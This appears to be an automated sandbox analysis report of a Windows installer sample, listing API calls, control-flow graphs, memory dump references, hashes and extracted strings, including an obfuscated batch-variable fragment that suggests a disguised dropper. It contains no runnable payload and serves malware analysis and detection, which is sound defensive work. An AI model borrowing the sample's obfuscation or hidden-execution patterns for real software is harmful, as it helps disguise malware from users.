                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0042777E,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Set Rose=HwAlxFaces-Joke-Experiencing-Supply-S-qOwSample-Lopez-DcVpn-Fx-Hunt-Reg-enBrands-Younger-Benefits-Statistical-dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-RoPressure-Set Instrumentation=wRrQCNick-Vampire-Longer-ynaOpponents, xrefs: 004033FD
                                                                                                                                                                                                                                                                                                    • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                                    • ~wB, xrefs: 0040346F, 0040348A, 00403513
                                                                                                                                                                                                                                                                                                    • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ... %d%%$Set Rose=HwAlxFaces-Joke-Experiencing-Supply-S-qOwSample-Lopez-DcVpn-Fx-Hunt-Reg-enBrands-Younger-Benefits-Statistical-dDWrite-Duty-Pet-Entity-Barbados-Chile-Committed-Dodge-RoPressure-Set Instrumentation=wRrQCNick-Vampire-Longer-ynaOpponents$pAB$~wB

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                                    • API String ID: 247603264-1827671502

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                                                                                                                                    • API String ID: 1716503409-2209301699

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
• Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
• Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
• Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
• Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Memory Dump Source
• Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
• Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
